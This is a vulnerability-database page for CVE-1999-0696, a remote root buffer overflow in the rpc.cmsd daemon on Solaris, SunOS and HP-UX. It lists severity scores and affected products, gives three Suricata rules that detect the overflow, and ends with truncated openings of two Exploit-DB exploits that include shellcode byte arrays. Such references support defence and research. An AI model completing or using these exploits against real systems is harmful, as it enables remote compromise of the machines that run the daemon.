CVE-1999-0696
Published 1999-07-01
CVE-1999-0696: Buffer overflow in CDE Calendar Manager Service Daemon (rpc.cmsd).
Priority P3 · 38 · critical · CVSS 2.0: 10
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 12.16% (95.6th percentile)
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
Suricata
GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
suricata·2010-09-23
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 06|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_jump:4,0,relative,align; byte_test:4,>,1000,28,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; reference:url,www.cert.org/advisories/CA-99-08-cmsd.html; classtype:misc-attack; sid:2101909; rev:14; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101908; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt"; content:"|00 01 86 E4|"; depth:4; offset:12; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101907; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
exploitdb·1999-07-13
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*## copyright LAST STAGE OF DELIRIUM jul 1999 poland *://lsd-pl.net/ #*/
/*## rpc.cmsd #*/
#include
#include
#include
#include
#include
#include
#include
#define ADRNUM 1500
#define NOPNUM 1600
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PING 0
#define CMSD_CREATE 21
#define CMSD_INSERT 6
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
exploitdb·1999-07-13
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include
#include
#include
#include
#include
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [200
No writeups or analysis indexed.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/188
http://www.ciac.org/ciac/bulletins/j-051.shtml
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9908-102
Published: 1999-07-01